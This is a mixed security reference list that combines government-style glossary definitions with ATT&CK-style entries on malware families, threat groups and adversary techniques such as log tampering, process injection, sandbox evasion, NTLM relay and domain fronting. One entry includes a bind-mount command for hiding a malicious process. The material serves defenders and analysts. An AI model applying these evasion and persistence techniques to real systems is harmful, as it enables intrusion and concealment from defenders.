Definition: The result of a transformation of a message by means of a cryptographic system using keys such that a Relying Party can determine: (1) whether the transformation was created using the private key that corresponds to the public key in the signer’s digital certificate; and (2) whether the message has been altered since the transformation was made.

Term: IPS
Definition: System which can detect an intrusive activity and can also attempt to stop the activity, ideally before it reaches its targets.

Term: Obligation
Definition: An operation specified in a policy or policy set that should be performed by the PEP in conjunction with the enforcement of an authorization decision.

Name: yty
Type: malware
Description: yty is a modular, plugin-based malware framework. The components of the framework are written in a variety of programming languages.

Term: Distributed Network Protocol
Definition: DNP3 Distributed Network Protocol (published as IEEE 1815)

Term: claimant
Definition: The person who is asserting his or her identity

Term: Integrity protection
Definition: The process of providing assurance that data has not been modified since an authentication code was created for that data.

Term: cybersecurity supply chain risk management plan
Definition: A formal document that describes the implementations, requirements, constraints, and implications of cybersecurity supply chain risk management (C‑SCRM) controls selected for an information system or environment of operation that work in collaboration with the C‑SCRM strategy, policies, and implementation plan to provide a systematic and holistic approach to cybersecurity supply chain risk management across an enterprise. The C‑SCRM plan may be integrated with the system privacy and security plans into one consolidated document.

Term: telecommunications
Definition: The term 'telecommunications' means the transmission, between or among points specified by the user, of information of the user's choosing, without change in the form or content of the information as sent and received.

Term: XCCDF Content
Definition: A file conforming to the XCCDF schema.

Term: Extensible Authentication Protocol (EAP)
Definition: A framework for adding arbitrary authentication methods in a standardized way to any protocol.

Term: Cryptographic Ignition Key
Definition: A device or electronic key used to unlock the secure mode of cryptographic equipment.

Term: National Essential Functions
Definition: The select functions that are necessary to lead and sustain the United States during a catastrophic emergency and that, therefore, must be supported through COOP, COG, and ECG capabilities.

Term: configuration management
Definition: A collection of activities focused on establishing and maintaining the integrity of products and systems, through control of the processes for initializing, changing, and monitoring the configurations of those products and systems throughout the system development life cycle.

Name: Clambling
Type: malware
Description: Clambling is a modular backdoor written in C++ that has been used by Threat Group-3390 since at least 2017.

Term: Border Gateway Protocol
Definition: The Border Gateway Protocol is a protocol designed by the Internet Engineering Task Force (IETF) to exchange routing information between autonomous systems.

Term: COA
Definition: The cryptographic key management system (CKMS) entity that provides overall CKMS data synchronization and system security oversight for an organization or set of organizations.

Term: KECCAK Message Authentication Code
Definition: KECCAK Message Authentication Code.

Name: Disable or Modify Cloud Log
Type: attack-pattern
Description: An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities. 

For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity. They may alternatively tamper with logging functionality, for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files. In Office 365, an adversary may disable logging on mail collection activities for specific users by using the Set-MailboxAuditBypassAssociation cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.

Term: IMAP
Definition: a method of communication used to read electronic mail stored in a remote server.

Term: <em>T</em>
Definition: The MAC that is generated as an internal variable in the CCM processes.

Term: User Principal Name
Definition: In Windows Active Directory, this is the name of a system user in email address format, i.e., a concatenation of username, the “@” symbol, and domain name.

Term: privacy requirement
Definition: A requirement that applies to an information system or an organization that is derived from applicable laws, executive orders, directives, policies, standards, regulations, procedures, and/or mission/business needs with respect to privacy. Note: The term privacy requirement can be used in a variety of contexts from high-level policy activites to low-level implementation activities in system development and engineering disciplines.

Term: sniffer
Definition: See packet sniffer and passive wiretapping.

Term: security control baseline
Definition: The set of minimum security controls defined for a low-impact, moderate- impact, or high-impact information system.

Term: Meter
Definition: In LMS, the number of bytes associated with each node of a Merkle tree.

Term: information system component
Definition: See system component.

Term: checksum
Definition: A value computed on data to detect error or manipulation.

Name: BeaverTail
Type: malware
Description: BeaverTail is a malware that has both a JavaScript and C++ variant. Active since 2022, BeaverTail is capable of stealing logins from browsers and serves as a downloader for second stage payloads. BeaverTail has previously been leveraged by North Korea-affiliated actors identified as DeceptiveDevelopment or Contagious Interview. BeaverTail has been delivered to victims through code repository sites and has been embedded within malicious attachments.

Term: Object, Assessment
Definition: Assessment objects identify the specific items being assessed, and as such, can have one or more security defects. Assessment objects include specifications, mechanisms, activities, and individuals which in turn may include, but are not limited to, devices, software products, software executables, credentials, accounts, account-privileges, things to which privileges are granted (including data and physical facilities), etc. See SP 800-53A.

Term: regrader
Definition: A trusted process explicitly authorized to re-classify and re-label data in accordance with a defined policy exception. Untrusted /Unauthorized processes are such actions by the security policy.

Term: computer network exploitation (CNE)
Definition: Actions taken in cyberspace to gain intelligence, maneuver, collect information, or perform other enabling actions required to prepare for future military operations.

Name: Thread Local Storage
Type: attack-pattern
Description: Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. 

TLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process’ memory space using other Process Injection techniques such as Process Hollowing.

Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process.

Term: IT
Definition: The art and applied sciences that deal with data and information. Examples are capture, representation, processing, security, transfer, interchange, presentation, management, organization, storage, and retrieval of data and information.

Term: convolutional neural networks
Definition: A class of feed-forward neural networks that include at least one convolutional layer, referred to as CNNs. In convolutional layers, feature detectors (known as kernels or filters) detect specific features across the input data. CNNs are primarily used for processing grid-like data, such as images, and are particularly effective for tasks like image classification, object detection, and image segmentation.

Term: SORN
Definition: An official public notice of an organization’s system(s) of records, as required by the Privacy Act of 1974, that identifies: (i) the purpose for the system of records; (ii) the individuals covered by information in the system of records; (iii) the categories of records maintained about individuals; and (iv) the ways in which the information is shared.

Name: Water Galura
Type: intrusion-set
Description: Water Galura are the operators of the Qilin Ransomware-as-a-Service (RaaS) who handle payload generation, ransom negotiations, and the publication of stolen data for Qilin affilates recruited on Russian cybercrime forums. Water Galura have been active since at least 2022 and use a double extortion model where they demand payment for providing decryption keys and for refraining from publishing the stolen data to their leak site.

Term: ZT
Definition: A collection of concepts and ideas designed to minimize uncertainty in enforcing accurate, least privilege per-request access decisions in information systems and services in the face of a network viewed as compromised.

Term: information technology product
Definition: A discrete, identifiable information technology asset (hardware, software, firmware) that represents a building block of a system. System components include commercial information technology products.

Name: Virtualization/Sandbox Evasion
Type: attack-pattern
Description: Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.

Adversaries may use several methods to accomplish Virtualization/Sandbox Evasion such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.

Term: Privacy Capability
Definition: See capability.

Term: federal agency
Definition: Any executive department, military department, government corporation, government-controlled corporation, or other establishment in the executive branch of the government (including the Executive Office of the President) or any independent regulatory agency, but does not include: 1) the General Accounting Office; 2) the Federal Election Commission; 3) the governments of the District of Columbia and of the territories and possessions of the United States and their various subdivisions; or 4) government-owned, contractor-operated facilities, including laboratories engaged in national defense research and production activities. Also referred to as Federal Agency.

Name: Network Logon Script
Type: attack-pattern
Description: Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects. These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems. 
 
Adversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

Term: Master Scenario Events List (MSEL)
Definition: A chronologically sequenced outline of the simulated events and key event descriptions that participants will be asked to respond to during an exercise.

Name: HIDEDRV
Type: malware
Description: HIDEDRV is a rootkit used by APT28. It has been deployed along with Downdelph to execute and hide that malware.

Term: Biometric Data
Definition: Biological attribute of an individual from which distinctive and repeatable values can be extracted for the purpose of automated recognition. Fingerprint ridge structure and face topography are examples of biometric characteristics.

Term: Capability, Trust Management
Definition: An ISCM capability that ensures that untrustworthy persons are prevented from being trusted with network access (to prevent insider attacks).

Term: mechanisms
Definition: An assessment object that includes specific protection-related items (e.g., hardware, software, or firmware).

Term: Bluetooth
Definition: A wireless protocol that allows two similarly equipped devices to communicate with each other within a short distance (e.g., 30 ft.).

Term: Assurance of validity
Definition: Confidence that either a key or a set of domain parameters is arithmetically correct.

Term: <em>n</em>
Definition: The number of bits in the stream being tested.

Term: event
Definition: Any observable occurrence involving computing assets, including physical and virtual platforms, networks, services, and cloud environments.

Term: System Integrator
Definition: Those organizations that provide customized services to the acquirer including custom development, test, operations, and maintenance.

Term: Health Insurance Portability and Accountability Act
Definition: A federal statute that called on the federal Department of Health and Human Services to establish regulatory standards to protect the privacy and security of individually identifiable health information.

Term: internal network
Definition: A network where establishment, maintenance, and provisioning of security controls are under the direct control of organizational employees or contractors; or the cryptographic encapsulation or similar security technology implemented between organization-controlled endpoints, provides the same effect (with regard to confidentiality and integrity). An internal network is typically organization-owned, yet may be organization-controlled while not being organization-owned.

Term: Key revocation
Definition: A function in the lifecycle of keying material; a process whereby a notice is made available to affected entities that keying material should be removed from operational use prior to the end of the established cryptoperiod of that keying material.

Term: agreement
Definition: Mutual acknowledgement of terms and conditions under which a working relationship is conducted (e.g., memorandum of agreement or contract).

Term: precursor
Definition: A sign that an attacker may be preparing to cause an incident.

Term: Matching
Definition: The process of determining whether two or more asset identification expressions refer to the same asset.

Name: Email Forwarding Rule
Type: attack-pattern
Description: Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations. Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators. Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.

Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.

In some environments, administrators may be able to enable email forwarding rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions. Adversaries that abuse such features may be able to enable forwarding on all or specific mail an organization receives.

Term: Verifier Impersonation
Definition: A technique for attempting to acquire sensitive data, such as bank account numbers, through a fraudulent solicitation in email or on a web site, in which the perpetrator masquerades as a legitimate business or reputable person.

Term: Overt Testing
Definition: Security testing performed with the knowledge and consent of the organization’s IT staff.

Name: Domain Fronting
Type: attack-pattern
Description: Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, "domainless" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).

For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.

Term: internal network
Definition: A network where the establishment, maintenance, and provisioning of security controls are under the direct control of organizational employees or contractors. Cryptographic encapsulation or similar security technology implemented between organization-controlled endpoints provides the same effect (at least regarding confidentiality and integrity). An internal network is typically organization-owned yet may be organization-controlled while not being organization-owned.

Term: security-relevant event
Definition: Any event that attempts to change the security state of the system, (e.g., change discretionary access controls, change the security level of the subject, change user password, etc.). Also, any event that attempts to violate the security policy of the system, (e.g., too many attempts to login, attempts to violate the mandatory access control limits of a device, attempts to downgrade a file, etc.).

Term: NAT
Definition: A mechanism for mapping addresses on one network to addresses on another network, typically private addresses to public addresses.

Term: restricted data
Definition: All data concerning (i) design, manufacture, or utilization of atomic weapons; (ii) the production of special nuclear material; or (iii) the use of special nuclear material in the production of energy, but shall not include data declassified or removed from the Restricted Data category pursuant to Section 142 [of the Atomic Energy Act of 1954].

Name: Container and Resource Discovery
Type: attack-pattern
Description: Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.

These resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs. In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution.

Term: Federated Identity Management
Definition: A process that allows for the conveyance of identity and authentication information across a set of networked systems.

Term: Identity and access management
Definition: Broadly refers to the administration of individual identities within a system, such as a company, a network or even a country. In enterprise IT, identity management is about establishing and managing the roles and access privileges of individual network users.

Term: Short Message Service (SMS)
Definition: a mobile phone network facility that allows users to send and receive alphanumeric text messages of up to 160 characters on their cell phone or other handheld device

Term: Audit administrator
Definition: An FCKMS role that is responsible for establishing and reviewing an audit log, assuring that the log is reviewed periodically and after any security-compromise-relevant event, and providing audit reports to FCKMS managers.

Term: computerized telephone system (CTS)
Definition: A generic term used to describe any telephone system that uses centralized stored program computer technology to provide switched telephone networking features and/or VoIP services.

Term: attacker
Definition: A person who seeks to exploit potential vulnerabilities of a system.

Term: United States Government Configuration Baseline (USGCB)
Definition: The United States Government Configuration Baseline (USGCB) provides security configuration baselines for Information Technology products widely deployed across the federal agencies. The USGCB baseline evolved from the federal Desktop Core Configuration mandate. The USGCB is a Federal government-wide initiative that provides guidance to agencies on what should be done to improve and maintain an effective configuration settings focusing primarily on security.

Term: Group
Definition: An item that can hold other items; allows an author to collect related items into a common structure and provide descriptive text and references about them.

Term: Attribute Reference
Definition: A statement asserting a property of a subscriber without necessarily containing identity information, independent of format. For example, for the attribute “birthday,” a reference could be “older than 18” or “born in December.”

Term: subject
Definition: A person, organization, device, hardware, network, software, or service. In these guidelines, a subject is a natural person.

Term: VPN
Definition: Protected information system link utilizing tunneling, security controls, and endpoint address translation giving the impression of a dedicated line.

Term: approved
Definition: FIPS-approved or NIST-recommended: an algorithm or technique that is either 1) specified in a FIPS or a NIST Recommendation, or 2) adopted in a FIPS or a NIST Recommendation.

Term: NIST Special Publication
Definition: A type of publication issued by NIST. Specifically, the Special Publication 800-series reports on the Information Technology Laboratory's research, guidelines, and outreach efforts in computer security, and its collaborative activities with industry, government, and academic organizations. The 1800 series reports the results of NCCoE demonstration projects.

Term: requirements engineering
Definition: An interdisciplinary function that mediates between the domains of the acquirer and supplier to establish and maintain the requirements to be met by the system, software, or service of interest.

Term: Static key
Definition: A key that is intended for use for a relatively long period of time and is typically intended for use in many instances of a cryptographic key-establishment scheme. Contrast with ephemeral key.

Name: Input Capture
Type: attack-pattern
Description: Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture).

Term: Genesis block
Definition: The first block of a blockchain network; it records the initial state of the system.

Term: Federal Dashboard
Definition: A dashboard instance that: 
• Collects summary data from the base-level dashboards across multiple organizations; and 
• Does not collect defects at the assessment object-level data or defects. It summarizes federal level defects and assessment object categories, but not local (base) level defects or local (base) categories.

Term: User Key
Definition: A key that is used for granting access to a user account via the SSH protocol  (as opposed to a host key, which does not grant access to anything but serves to authenticate a host). Both authorized keys and identity keys are user keys. A user key is the equivalent of an access token.

Term: System initialization
Definition: A function in the lifecycle of a cryptographic key; setting up and configuring a system for secure operation.

Term: party
Definition: An individual person, organization, device, or process. Used interchangeably with “entity.”

Term: <em>PrivKeyU, PrivKeyV</em>
Definition: Private key of party U or V, respectively.

Term: <em>sobs</em>
Definition: The observed value which is used as a statistic in the Frequency test.

Term: Behavioral Anomaly Detection
Definition: A mechanism providing a multifaceted approach to detecting cybersecurity attacks.

Term: Match
Definition: Comparison decision stating that the biometric probe(s) and the biometric reference are from the same source. Match is a possible result of a Comparison. The opposite of a match is a non-match.

Term: Partitioning
Definition: Managing guest operating system access to hardware so that each guest OS can access its own resources but cannot encroach on the other guest OSs’ resources or any resources not allocated for virtualization use.

Term: Personal Information
Definition: Any information relating to an identified or identifiable natural person (data subject).

Term: Cloud Auditor
Definition: A party that can conduct an independent assessment of cloud services, information system operations, performance, and security of the cloud implementation

Term: account resolution
Definition: The association of an RP subscriber account with information that is already held by the RP prior to the federation transaction and outside of a trust agreement.

Term: Comprehensive Test
Definition: A test of all systems and components that support a particular IT plan, such as a contingency plan or computer security incident response plan.

Name: Bind Mounts
Type: attack-pattern
Description: Adversaries may abuse bind mounts on file structures to hide their activity and artifacts from native utilities. A bind mount maps a directory or file from one location on the filesystem to another, similar to a shortcut on Windows. It’s commonly used to provide access to specific files or directories across different environments, such as inside containers or chroot environments, and requires sudo access. 

Adversaries may use bind mounts to map either an empty directory or a benign `/proc` directory to a malicious process’s `/proc` directory. Using the commands `mount –o bind /proc/benign-process /proc/malicious-process` (or `mount –B`), the malicious process's `/proc` directory is overlayed with the contents of a benign process's `/proc` directory. When system utilities query process activity, such as `ps` and `top`, the kernel follows the bind mount and presents the benign directory’s contents instead of the malicious process's actual `/proc` directory. As a result, these utilities display information that appears to come from the benign process, effectively hiding the malicious process's metadata, executable, or other artifacts from detection.

Name: CHIMNEYSWEEP
Type: malware
Description: CHIMNEYSWEEP is a backdoor malware that was deployed during HomeLand Justice along with ROADSWEEP ransomware, and has been used to target Farsi and Arabic speakers since at least 2012.

Term: trust anchor
Definition: A public key and the name of a certification authority that is used to validate the first certificate in a sequence of certificates. The trust anchor’s public key is used to verify the signature on a certificate issued by a trust-anchor certification authority. The security of the validation process depends upon the authenticity and integrity of the trust anchor. Trust anchors are often distributed as self-signed certificates.

Term: Custom Environment
Definition: An environment containing systems in which the functionality and degree of security do not fit the other types of environments.

Term: AC
Definition: The decision to permit or deny a subject access to system objects (network, data, application, service, etc.).

Term: Application Level Gateway (ALG)
Definition: Application Level Gateways (ALGs) are application specific translation agents that allow an application (like VOIP) on a host in one address realm to connect to its counterpart running on a host in different realm transparently. An ALG may interact with NAT to set up state, use NAT state information, modify application specific payload and perform whatever else is necessary to get the application running across disparate address realms.

Term: AC
Definition: Enable authorized use of a resource while preventing unauthorized use or use in an unauthorized manner.

Term: Prose Checklist
Definition: A checklist that provides a narrative descriptions of how a person can manually alter a product’s configuration.

Name: Name Resolution Poisoning and SMB Relay
Type: attack-pattern
Description: By responding to LLMNR/NBT-NS/mDNS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. 

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name.

Multicast Domain Name System(mDNS) is a zero-configuration service used to resolve hostnames to IP addresses with “.local” as a top-level domain. MDNS is based upon Domain Name System (DNS) format and allows hosts on the same network segment to perform name resolution for other hosts, using multicast.

Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137)/mDNS (UDP 5353) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through Network Sniffing and crack the hashes offline through Brute Force to obtain the plaintext passwords.

In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various other protocols, such as LDAP, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response. 

Several tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and Responder.

Term: Stream component
Definition: A major element of a data stream, such as an XCCDF benchmark or a set of OVAL definitions.

Term: SA
Definition: Individual responsible for the installation and maintenance of an information system, providing effective information system utilization, adequate security parameters, and sound implementation of established CS policy and procedures.

Term: threat analysis
Definition: Formal description and evaluation of threat to an information system.

Term: denial of service (DoS)
Definition: The prevention of authorized access to resources or the delaying of time-critical operations.

Term: Environmental Support
Definition: Any environmental factor for which the organization determines that it needs to continue to provide support in a contingency situation, even if in a degraded state.

Term: telecommunications security (TSEC) nomenclature
Definition: The NSA system for identifying the type and purpose of certain items of COMSEC material.

Term: senior agency official for privacy
Definition: The senior official, designated by the head of each agency, who has agency-wide responsibility for privacy, including implementation of privacy protections; compliance with Federal laws, regulations, and policies relating to privacy; management of privacy risks at the agency; and a central policy-making role in the agency’s development and evaluation of legislative, regulatory, and other policy proposals.

Term: Key derivation
Definition: As used in this Recommendation, a method of deriving keying material from a pre-shared key and possibly other information. See NIST SP 800-108.

Name: OopsIE
Type: malware
Description: OopsIE is a Trojan used by OilRig to remotely execute commands as well as upload/download files to/from victims.

Term: Capability, Anomalous Event Detection Management
Definition: An ISCM capability that identifies routine and unexpected events that can compromise security within a time frame that prevents or reduces the impact (i.e., consequences) of the events to the extent possible.

Term: CIO
Definition: Agency official responsible for:
(i) Providing advice and other assistance to the head of the executive agency and other senior management personnel of the agency to ensure that information technology is acquired and information resources are managed in a manner that is consistent with laws, Executive Orders, directives, policies, regulations, and priorities established by the head of the agency;
(ii) Developing, maintaining, and facilitating the implementation of a sound and integrated information technology architecture for the agency; and 
(iii) Promoting the effective and efficient design and operation of all major information resources management processes for the agency, including improvements to work processes of the agency.

Term: AI
Definition: A machine-based system that can, for a given set of human-defined objectives, make predictions, recommendations, or decisions influencing real or virtual environments.

Name: Indrik Spider
Type: intrusion-set
Description: Indrik Spider is a Russia-based cybercriminal group that has been active since at least 2014. Indrik Spider initially started with the Dridex banking Trojan, and then by 2017 they began running ransomware operations using BitPaymer, WastedLocker, and Hades ransomware. Following U.S. sanctions and an indictment in 2019, Indrik Spider changed their tactics and diversified their toolset.

Term: syncable authenticators
Definition: Software or hardware cryptographic authenticators that allow authentication keys to be cloned and exported to other storage to sync those keys to other authenticators (i.e., devices).

Term: assurance of integrity
Definition: The property that data or information have not been altered or destroyed in an unauthorized manner.

Term: file sharing services
Definition: Services that include but are not limited to information sharing and access to information via web-based file sharing or storage.

Term: FFC
Definition: Finite Field Cryptography, the public-key cryptographic methods using operations in a multiplicative group of a finite field.

Name: LunarMail
Type: malware
Description: LunarMail is a backdoor that has been used by Turla since at least 2020 including in a compromise of a European ministry of foreign affairs (MFA) in conjunction with LunarLoader and LunarWeb. LunarMail is designed to be deployed on workstations and can use email messages and Steganography in command and control.

Term: SCADS
Definition: A generic name for a computerized system that is capable of gathering and processing data and applying operational controls over long distances. Typical uses include power transmission and distribution and pipeline systems. SCADA was designed for the unique communication challenges (e.g., delays, data integrity) posed by the various media that must be used, such as phone lines, microwave, and satellite. Usually shared rather than dedicated.

Term: availability
Definition: Timely, reliable access to data and information services for authorized users.

Name: BadPatch
Type: malware
Description: BadPatch is a Windows Trojan that was used in a Gaza Hackers-linked campaign.

Term: Proof of work consensus model
Definition: A consensus model where a publishing node wins the right to publish the next block by expending time, energy, and computational cycles to solve a hard-to-solve, but easy-to-verify problem (e.g., finding the nonce which, when combined with the data to be added to the block, will result in a specific output pattern).

Name: Proton
Type: malware
Description: Proton is a macOS backdoor focusing on data theft and credential access .

Term: check word
Definition: Cipher text generated by cryptographic logic to detect failures in cryptography.

Term: data mining
Definition: An analytical process that attempts to find correlations or patterns in large data sets for the purpose of data or knowledge discovery.

Term: DVD-RW
Definition: A rewritable (re-recordable) DVD for both movies and data from the DVD Forum.

Term: Update
Definition: A patch, upgrade, or other modification to code that corrects security and/or functionality problems in software.

Term: configuration management
Definition: A collection of activities focused on establishing and maintaining the integrity of information technology products and information systems, through control of processes for initializing, changing, and monitoring the configurations of those products and systems throughout the system development life cycle.

Term: Plan Coordinator
Definition: A person responsible for all aspects of IT planning, including the TT&E element of maintaining the IT plans. The plan coordinator has overall responsibility for the IT plans, including development, implementation, and maintenance.

Term: Zero Trust Architecture
Definition: An enterprise’s cybersecurity plan that utilizes zero trust concepts and encompasses component relationships, workflow planning, and access policies. Therefore, a zero trust enterprise is the network infrastructure (physical and virtual) and operational policies that are in place for an enterprise as a product of a zero trust architecture plan.

Term: Source authentication
Definition: A process that provides assurance of the source of information.

Name: SDelete
Type: tool
Description: SDelete is an application that securely deletes data in a way that makes it unrecoverable. It is part of the Microsoft Sysinternals suite of tools.

Name: OutSteel
Type: malware
Description: OutSteel is a file uploader and document stealer developed with the scripting language AutoIT that has been used by Saint Bear since at least March 2021.

Term: AC
Definition: The process of granting or denying specific requests: 1) obtain and use information and related information processing services; and 2) enter specific physical facilities (e.g., Federal buildings, military establishments, border crossing entrances).

Term: linkable information
Definition: information about or related to an individual for which there is a possibility of logical association with other information about the individual

Term: basic testing
Definition: See basic testing.

Term: Concatenation
Definition: Concatenation of two strings X and Y.

Term: architecture
Definition: The design of the network of the hotel environment and the components that are used to construct it.

Term: Transport Layer Security (TLS)
Definition: An authentication and security protocol that is widely implemented in browsers and web servers. TLS is defined by RFC 5246 and RFC 8446. TLS is similar to the older Secure Sockets Layer (SSL) protocol, and TLS 1.0 is effectively SSL version 3.1. [NIST SP 800-52] specifies how TLS is to be used in government applications.

Name: ABK
Type: malware
Description: ABK is a downloader that has been used by BRONZE BUTLER since at least 2019.

Name: NDiskMonitor
Type: malware
Description: NDiskMonitor is a custom backdoor written in .NET that appears to be unique to Patchwork.

Term: system user
Definition: An individual or (system) process acting on behalf of an individual that is authorized to access information and information systems to perform assigned duties. 
Note: With respect to SecCM, an information system user is an individual who uses the information system functions, initiates change requests, and assists with functional testing.

Term: split tunneling
Definition: A method that routes organization-specific traffic through the SSL VPN tunnel, but routes other traffic through the remote user's default gateway.

Term: Capability, ISCM
Definition: See ISCM Capability.

Term: MASK
Definition: a byte string.

Term: Manage Boundaries
Definition: See Capability, Boundary Management.

Term: high-impact system
Definition: An information system in which at least one security objective (i.e., confidentiality, integrity, or availability) is assigned a FIPS 199 potential impact value of high. Note: For National Security Systems, CNSSI No. 1253 assigns one impact value (low, moderate, or high) for each of the three security objectives (confidentiality, integrity, and availability), rather than using the FIPS 200 high water mark across security objectives.

Term: joint authorization
Definition: Authorization involving multiple authorizing officials.

Term: Brute Force Password Attack
Definition: In cryptography, an attack that involves trying all possible combinations to find a match.

Term: privacy loss budget
Definition: An upper bound on the cumulative total privacy loss for individuals.

Term: AC
Definition: The process of granting or denying specific requests to 1) obtain and use information and related information processing services and 2) enter specific physical facilities (e.g., federal buildings, military establishments, border crossing entrances).

Term: system owner (or program manager)
Definition: An organizational official responsible for the procurement, development, integration, modification, operation, maintenance, and disposal of a system.

Term: PKI
Definition: The architecture, organization, techniques, practices, and procedures that collectively support the implementation and operation of a certificate-based public key cryptographic system. Framework established to issue, maintain, and revoke public key certificates.

Term: KAS2-bilateral-confirmation
Definition: Key-Agreement Scheme 2 with bilateral confirmation.

Term: <em>Predictor</em>
Definition: A function that predicts the next value in a sequence, based on previously observed values in the sequence.

Term: anonymization
Definition: A process that removes the association between the identifying dataset and the data subject.

Term: Three-key Triple Data Encryption Algorithm
Definition: Three-key Triple Data Encryption Algorithm specified in [NIST SP 800-67].

Term: SORN
Definition: A notice that federal agencies publish in the Federal Register to describe their system of record.

Name: BoxCaon
Type: malware
Description: BoxCaon is a Windows backdoor that was used by IndigoZebra in a 2021 spearphishing campaign against Afghan government officials. BoxCaon's name stems from similarities shared with the malware family xCaon.

Term: Brute Force Password Attack
Definition: A method of accessing an obstructed device by attempting multiple combinations of numeric/alphanumeric passwords.

Term: impact value
Definition: The assessed worst-case potential impact that could result from a compromise of the confidentiality, integrity, or availability of information expressed as a value of low, moderate, or high.

Term: Fair Information Practice Principles
Definition: Principles that are widely accepted in the United States and internationally as a general framework for privacy and that are reflected in various federal and international laws and policies. In a number of organizations, the principles serve as the basis for analyzing privacy risks and determining appropriate mitigation strategies.

Term: space structures
Definition: Any human-made assets in space, including “space debris” or “space junk” that is no longer in use for any business or mission need.

Name: VDSO Hijacking
Type: attack-pattern
Description: Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. 

VDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via Ptrace System Calls. However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).

